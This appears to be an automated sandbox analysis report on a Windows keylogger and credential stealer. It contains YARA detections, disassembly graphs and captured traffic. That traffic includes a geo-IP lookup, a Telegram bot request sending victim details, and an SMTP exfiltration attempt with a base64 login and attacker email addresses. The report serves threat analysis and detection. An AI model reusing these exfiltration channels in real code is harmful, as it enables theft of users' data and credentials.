                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:50 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-11-07 14:19:51 UTC1221INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:51 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32369
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJcrnJMjjEDYub%2F1m0vTioX3f9ku9i%2FAy9VuwML9AFHHriPI%2FHlzBNY%2BOee93aQXGAscibxV%2FtgsvHRNtoWMSiLMezyHcf7UDvuIRC137SXRKY4v5Gq18c3s9ETQlWBlMNjXdN4l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf5ec0f7a4794-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1210&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1839898&cwnd=234&unsent_bytes=0&cid=cc30eb71d147a109&ts=147&x=0"
                                                                                                                                            2024-11-07 14:19:51 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                                                                                                            2024-11-07 14:19:51 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.849727149.154.167.2204433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:52 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2008/11/2024%20/%2006:12:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-11-07 14:19:52 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:52 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 55
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-11-07 14:19:52 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                            SMTP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                            Nov 7, 2024 15:19:58.450747013 CET58749728208.91.198.143192.168.2.8220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Nov 7, 2024 15:19:58.450997114 CET49728587192.168.2.8208.91.198.143EHLO 210979
                                                                                                                                            Nov 7, 2024 15:19:58.635401011 CET58749728208.91.198.143192.168.2.8250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Nov 7, 2024 15:19:58.636321068 CET49728587192.168.2.8208.91.198.143AUTH login c2VzaWxlYnJ1Y2VAZWxlbWFjdWFlLmNvbQ==
                                                                                                                                            Nov 7, 2024 15:19:58.799144983 CET58749728208.91.198.143192.168.2.8334 UGFzc3dvcmQ6
                                                                                                                                            Nov 7, 2024 15:20:00.265482903 CET58749728208.91.198.143192.168.2.8535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                                                                            Nov 7, 2024 15:20:00.265752077 CET49728587192.168.2.8208.91.198.143MAIL FROM:<sesilebruce@elemacuae.com>
                                                                                                                                            Nov 7, 2024 15:20:00.430349112 CET58749728208.91.198.143192.168.2.8250 2.1.0 Ok
                                                                                                                                            Nov 7, 2024 15:20:00.430538893 CET49728587192.168.2.8208.91.198.143RCPT TO:<ilguerrii12@gmail.com>
                                                                                                                                            Nov 7, 2024 15:20:00.609477043 CET58749728208.91.198.143192.168.2.8554 5.7.1 <ilguerrii12@gmail.com>: Relay access denied

                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:09:19:26
                                                                                                                                            Start date:07/11/2024
                                                                                                                                            Path:C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\Lpjrd6Wxad.exe"
                                                                                                                                            Imagebase:0x850000
                                                                                                                                            File size:274'432 bytes
                                                                                                                                            MD5 hash:2BA023727B7A6399471D26A38F26695A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4035317693.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1555252525.0000000000852000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4035317693.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:11.2%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:64.3%
                                                                                                                                              Total number of Nodes:14
                                                                                                                                              Total number of Limit Nodes:3
                                                                                                                                              execution_graph 18150 58293f0 18151 582941d 18150->18151 18153 582b2ff 18151->18153 18155 5829726 18151->18155 18156 5828aa8 18151->18156 18154 5828aa8 LdrInitializeThunk 18154->18155 18155->18153 18155->18154 18157 5828aba 18156->18157 18159 5828abf 18156->18159 18157->18155 18158 58291e9 LdrInitializeThunk 18158->18157 18159->18157 18159->18158 18160 58290ac 18165 5828f63 18160->18165 18161 58290a4 LdrInitializeThunk 18163 5829201 18161->18163 18164 5828aa8 LdrInitializeThunk 18164->18165 18165->18161 18165->18164

                                                                                                                                              Executed Functions

                                                                                                                                              Function 058247A8 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: N
                                                                                                                                              • API String ID: 0-1130791706
                                                                                                                                              • Opcode ID: f4fedbbfcfe657bd42efaa58c2cdf9c9339486bc5124009ad5ca480186931e22
                                                                                                                                              • Instruction ID: ed14e4eaf898cc215ad7eb495778521c430732378682a28b8b02de8c12869047
                                                                                                                                              • Opcode Fuzzy Hash: f4fedbbfcfe657bd42efaa58c2cdf9c9339486bc5124009ad5ca480186931e22
                                                                                                                                              • Instruction Fuzzy Hash: FE73E631D1075A8EDB11EF68C954A99FBB1FF99310F11C69AE44877221EB70AAC4CF81
                                                                                                                                              Function 058293F0 Relevance: 3.5, Strings: 1, Instructions: 2230COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: K
                                                                                                                                              • API String ID: 0-856455061
                                                                                                                                              • Opcode ID: 8582039cd3fef3df08a515c26d1d11289daf8410d144153b4974aae8565ec979
                                                                                                                                              • Instruction ID: 9724db2033c5ed9027b05b7df5f3d81ad7b1291b352dfb16d2f9a3e3c5b75166
                                                                                                                                              • Opcode Fuzzy Hash: 8582039cd3fef3df08a515c26d1d11289daf8410d144153b4974aae8565ec979
                                                                                                                                              • Instruction Fuzzy Hash: 9133D431D147198ADB11EF68C954A9DFBB1FF99300F11C69AE44CA7221EB70AAC5CF81
                                                                                                                                              Function 05828AA8 Relevance: 2.0, APIs: 1, Instructions: 526COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 972 5828aa8-5828ab8 973 5828aba 972->973 974 5828abf-5828acb 972->974 975 5828beb-5828bf5 973->975 977 5828ad2-5828ae7 974->977 978 5828acd 974->978 981 5828bfb-5828c3b 977->981 982 5828aed-5828af8 977->982 978->975 999 5828c42-5828cf7 981->999 985 5828bf6 982->985 986 5828afe-5828b05 982->986 985->981 988 5828b32-5828b3d 986->988 989 5828b07-5828b1e 986->989 993 5828b4a-5828b54 988->993 994 5828b3f-5828b47 988->994 989->999 1000 5828b24-5828b27 989->1000 1003 5828b5a-5828b64 993->1003 1004 5828bde-5828be3 993->1004 994->993 1029 5828cf9 999->1029 1030 5828cfe-5828d94 999->1030 1000->985 1002 5828b2d-5828b30 1000->1002 1002->988 1002->989 1003->985 1009 5828b6a-5828b86 1003->1009 1004->975 1014 5828b8a-5828b8d 1009->1014 1015 5828b88 1009->1015 1016 5828b94-5828b97 1014->1016 1017 5828b8f-5828b92 1014->1017 1015->975 1019 5828b9a-5828ba8 1016->1019 1017->1019 1019->985 1023 5828baa-5828bb1 1019->1023 1023->975 1024 5828bb3-5828bb9 1023->1024 1024->985 1026 5828bbb-5828bc0 1024->1026 1026->985 1027 5828bc2-5828bd5 1026->1027 1027->985 1032 5828bd7-5828bda 1027->1032 1029->1030 1035 5828e33-5828e39 1030->1035 1032->1024 1033 5828bdc 1032->1033 1033->975 1036 5828d99-5828dac 1035->1036 1037 5828e3f-5828e57 1035->1037 1040 5828db3-5828e04 1036->1040 1041 5828dae 1036->1041 1038 5828e6b-5828e7e 1037->1038 1039 5828e59-5828e66 1037->1039 1043 5828e80 1038->1043 1044 5828e85-5828ea1 1038->1044 1042 5829201-58292fe 1039->1042 1057 5828e06-5828e14 1040->1057 1058 5828e17-5828e29 1040->1058 1041->1040 1049 5829300-5829305 1042->1049 1050 5829306-5829310 1042->1050 1043->1044 1045 5828ea3 1044->1045 1046 5828ea8-5828ecc 1044->1046 1045->1046 1053 5828ed3-5828f05 1046->1053 1054 5828ece 1046->1054 1049->1050 1063 5828f07 1053->1063 1064 5828f0c-5828f4e 1053->1064 1054->1053 1057->1037 1060 5828e30 1058->1060 1061 5828e2b 1058->1061 1060->1035 1061->1060 1063->1064 1066 5828f50 1064->1066 1067 5828f55-5828f5e 1064->1067 1066->1067 1068 5829186-582918c 1067->1068 1069 5829192-58291a5 1068->1069 1070 5828f63-5828f88 1068->1070 1073 58291a7 1069->1073 1074 58291ac-58291c7 1069->1074 1071 5828f8a 1070->1071 1072 5828f8f-5828fc6 1070->1072 1071->1072 1082 5828fc8 1072->1082 1083 5828fcd-5828fff 1072->1083 1073->1074 1075 58291c9 1074->1075 1076 58291ce-58291e2 1074->1076 1075->1076 1079 58291e4 1076->1079 1080 58291e9-58291ff LdrInitializeThunk 1076->1080 1079->1080 1080->1042 1082->1083 1085 5829063-5829076 1083->1085 1086 5829001-5829026 1083->1086 1089 5829078 1085->1089 1090 582907d-58290a2 1085->1090 1087 5829028 1086->1087 1088 582902d-582905b 1086->1088 1087->1088 1088->1085 1089->1090 1093 58290b1-58290e9 1090->1093 1094 58290a4-58290a5 1090->1094 1095 58290f0-5829151 call 5828aa8 1093->1095 1096 58290eb 1093->1096 1094->1069 1102 5829153 1095->1102 1103 5829158-582917c 1095->1103 1096->1095 1102->1103 1106 5829183 1103->1106 1107 582917e 1103->1107 1106->1068 1107->1106
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e13e31eec986d5a0e7b654d8a6c9e44c48624c82284f806f393dd665ab84212a
                                                                                                                                              • Instruction ID: 1ea0459842a8716a83b09f9b02876a10ce91c7e1c77e3aeb3b4ceecdb30f1774
                                                                                                                                              • Opcode Fuzzy Hash: e13e31eec986d5a0e7b654d8a6c9e44c48624c82284f806f393dd665ab84212a
                                                                                                                                              • Instruction Fuzzy Hash: 4C22F874E002288FDB14DFA9C984B9DBBB2BF84304F1481A9D849EB355DB359D86CF51
                                                                                                                                              Function 058293E3 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4037774321.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5820000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: K
                                                                                                                                              • API String ID: 0-856455061
                                                                                                                                              • Opcode ID: ccf8e56fff8f72f21f90deb5e09e8f6d1f0c44526880e8af2a094523301395ef
                                                                                                                                              • Instruction ID: bcd869c1a559e3b6df878e6d62c1ff544dcd954a7a66d6a31afd9b715c677bde
                                                                                                                                              • Opcode Fuzzy Hash: ccf8e56fff8f72f21f90deb5e09e8f6d1f0c44526880e8af2a094523301395ef
                                                                                                                                              • Instruction Fuzzy Hash: C6B1E475D056198BDB14DFA9C8887DDBBB1FF89300F14C29AD408A7264EB74AAC5CF40
                                                                                                                                              Function 010269A0 Relevance: .5, Instructions: 515COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f3c1c49132a7e5bf79b9fe186af8a80ed684e4c84dd601950a89d7a66fe4c8ad
                                                                                                                                              • Instruction ID: 8bb43e9e1990068bd9bf9d6ecc849c9b6cf672633e85f25ba2f2afb6378cdcf7
                                                                                                                                              • Opcode Fuzzy Hash: f3c1c49132a7e5bf79b9fe186af8a80ed684e4c84dd601950a89d7a66fe4c8ad
                                                                                                                                              • Instruction Fuzzy Hash: 16127C70A002298FDB15DF69C894BAEBBF6BF88700F208559E846EB351DF359D45CB90
                                                                                                                                              Function 01026FC8 Relevance: .5, Instructions: 469COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3208 1026fc8-1026ffe 3209 1027006-102700c 3208->3209 3347 1027000 call 10269a0 3208->3347 3348 1027000 call 1027118 3208->3348 3349 1027000 call 1026fc8 3208->3349 3210 102700e-1027012 3209->3210 3211 102705c-1027060 3209->3211 3214 1027021-1027028 3210->3214 3215 1027014-1027019 3210->3215 3212 1027062-1027071 3211->3212 3213 1027077-102708b 3211->3213 3218 1027073-1027075 3212->3218 3219 102709d-10270a7 3212->3219 3220 1027093-102709a 3213->3220 3345 102708d call 102a0f3 3213->3345 3346 102708d call 102a0f8 3213->3346 3216 10270fe-102713b 3214->3216 3217 102702e-1027035 3214->3217 3215->3214 3229 1027146-1027166 3216->3229 3230 102713d-1027143 3216->3230 3217->3211 3221 1027037-102703b 3217->3221 3218->3220 3222 10270b1-10270b5 3219->3222 3223 10270a9-10270af 3219->3223 3227 102704a-1027051 3221->3227 3228 102703d-1027042 3221->3228 3225 10270bd-10270f7 3222->3225 3226 10270b7 3222->3226 3223->3225 3225->3216 3226->3225 3227->3216 3231 1027057-102705a 3227->3231 3228->3227 3237 1027168 3229->3237 3238 102716d-1027174 3229->3238 3230->3229 3231->3220 3239 10274fc-1027505 3237->3239 3240 1027176-1027181 3238->3240 3241 1027187-102719a 3240->3241 3242 102750d-1027519 3240->3242 3247 10271b0-10271cb 3241->3247 3248 102719c-10271aa 3241->3248 3249 102751b 3242->3249 3250 102751d 3242->3250 3257 10271ef-10271f2 3247->3257 3258 10271cd-10271d3 3247->3258 3248->3247 3261 1027484-102748b 3248->3261 3249->3250 3251 1027521 3250->3251 3252 102751f 3250->3252 3254 1027523 3251->3254 3255 1027525 3251->3255 3252->3251 3254->3255 3259 1027527 3255->3259 3260 1027529-1027549 3255->3260 3265 10271f8-10271fb 3257->3265 3266 102734c-1027352 3257->3266 3262 10271d5 3258->3262 3263 10271dc-10271df 3258->3263 3259->3260 3277 1027552-1027556 3260->3277 3278 102754b-1027550 3260->3278 3261->3239 3264 102748d-102748f 3261->3264 3262->3263 3262->3266 3267 1027212-1027218 3262->3267 3268 102743e-1027441 3262->3268 3263->3267 3269 10271e1-10271e4 3263->3269 3271 1027491-1027496 3264->3271 3272 102749e-10274a4 3264->3272 3265->3266 3274 1027201-1027207 3265->3274 3266->3268 3273 1027358-102735d 3266->3273 3281 102721a-102721c 3267->3281 3282 102721e-1027220 3267->3282 3283 1027447-102744d 3268->3283 3284 1027508 3268->3284 3275 10271ea 3269->3275 3276 102727e-1027284 3269->3276 3271->3272 3272->3242 3279 10274a6-10274ab 3272->3279 3273->3268 3274->3266 3280 102720d 3274->3280 3275->3268 3276->3268 3288 102728a-1027290 3276->3288 3285 102755c-102755d 3277->3285 3278->3285 3286 10274f0-10274f3 3279->3286 3287 10274ad-10274b2 3279->3287 3280->3268 3289 102722a-1027233 3281->3289 3282->3289 3290 1027472-1027476 3283->3290 3291 102744f-1027457 3283->3291 3284->3242 3286->3284 3295 10274f5-10274fa 3286->3295 3287->3284 3296 10274b4 3287->3296 3297 1027292-1027294 3288->3297 3298 1027296-1027298 3288->3298 3292 1027246-102726e 3289->3292 3293 1027235-1027240 3289->3293 3290->3261 3294 1027478-102747e 3290->3294 3291->3242 3299 102745d-102746c 3291->3299 3319 1027362-1027398 3292->3319 3320 1027274-1027279 3292->3320 3293->3268 3293->3292 3294->3240 3294->3261 3295->3239 3295->3264 3300 10274bb-10274c0 3296->3300 3301 10272a2-10272b9 3297->3301 3298->3301 3299->3247 3299->3290 3305 10274e2-10274e4 3300->3305 3306 10274c2-10274c4 3300->3306 3312 10272e4-102730b 3301->3312 3313 10272bb-10272d4 3301->3313 3305->3284 3308 10274e6-10274e9 3305->3308 3309 10274d3-10274d9 3306->3309 3310 10274c6-10274cb 3306->3310 3308->3286 3309->3242 3311 10274db-10274e0 3309->3311 3310->3309 3311->3305 3315 10274b6-10274b9 3311->3315 3312->3284 3325 1027311-1027314 3312->3325 3313->3319 3323 10272da-10272df 3313->3323 3315->3284 3315->3300 3326 10273a5-10273ad 3319->3326 3327 102739a-102739e 3319->3327 3320->3319 3323->3319 3325->3284 3328 102731a-1027343 3325->3328 3326->3284 3331 10273b3-10273b8 3326->3331 3329 10273a0-10273a3 3327->3329 3330 10273bd-10273c1 3327->3330 3328->3319 3343 1027345-102734a 3328->3343 3329->3326 3329->3330 3333 10273c3-10273c9 3330->3333 3334 10273e0-10273e4 3330->3334 3331->3268 3333->3334 3335 10273cb-10273d3 3333->3335 3336 10273e6-10273ec 3334->3336 3337 10273ee-102740d call 102791d 3334->3337 3335->3284 3339 10273d9-10273de 3335->3339 3336->3337 3340 1027413-1027417 3336->3340 3337->3340 3339->3268 3340->3268 3341 1027419-1027435 3340->3341 3341->3268 3343->3319 3345->3220 3346->3220 3347->3209 3348->3209 3349->3209
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c82c4b4280789194e393dda6b8e36c6f279179a00d790c6e1dcf899881e68096
                                                                                                                                              • Instruction ID: 9fe62b0f8b025bfcd44fb89dee9425fad39af430d1fafdbdb09a86733bd7334f
                                                                                                                                              • Opcode Fuzzy Hash: c82c4b4280789194e393dda6b8e36c6f279179a00d790c6e1dcf899881e68096
                                                                                                                                              • Instruction Fuzzy Hash: 70128030A00225DFCB55CF69C884AAEBBF2FF98300F6584A9E945EB261DB34DD45CB50
                                                                                                                                              Function 01023E12 Relevance: .3, Instructions: 263COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3787 1023e12-1023e25 3788 1023e27-1023e29 3787->3788 3789 1023e2e-1023e3e 3787->3789 3790 10240cc-10240d3 3788->3790 3791 1023e40 3789->3791 3792 1023e45-1023e55 3789->3792 3791->3790 3794 10240b3-10240c1 3792->3794 3795 1023e5b-1023e69 3792->3795 3798 10240d4-1024152 3794->3798 3800 10240c3-10240c7 call 10202c8 3794->3800 3795->3798 3799 1023e6f 3795->3799 3799->3798 3801 1023f00-1023f21 3799->3801 3802 1023f26-1023f47 3799->3802 3803 1024067-1024082 call 10202d8 3799->3803 3804 10240a7-10240b1 3799->3804 3805 1024084-10240a5 call 10228f0 3799->3805 3806 102400e-1024034 3799->3806 3807 1023f4c-1023f6d 3799->3807 3808 1023fcc-1024009 3799->3808 3809 1023e8d-1023eae 3799->3809 3810 1023f72-1023f9a 3799->3810 3811 1023eb3-1023ed5 3799->3811 3812 1023e76-1023e88 3799->3812 3813 1023eda-1023efb 3799->3813 3814 1024039-1024065 3799->3814 3815 1023f9f-1023fc7 3799->3815 3800->3790 3801->3790 3802->3790 3803->3790 3804->3790 3805->3790 3806->3790 3807->3790 3808->3790 3809->3790 3810->3790 3811->3790 3812->3790 3813->3790 3814->3790 3815->3790
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.4034890683.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_1020000_Lpjrd6Wxad.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c9a22ebe34882a3387a6e83f7c6696a5d45886de3a3c7a01b00d8927ce72b739
                                                                                                                                              • Instruction ID: f5c17ba316014793168f61fd1d1e60b7d61cad5dd4f67e59501c5298fb47a662
                                                                                                                                              • Opcode Fuzzy Hash: c9a22ebe34882a3387a6e83f7c6696a5d45886de3a3c7a01b00d8927ce72b739
                                                                                                                                              • Instruction Fuzzy Hash: 7591C870B04219DFDB08AFB4D89427E77B3BFC9B00B158A6EE442E7294DE35D8069791
                                                                                                                                              Function 0102C147 Relevance: .2, Instructions: 234COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
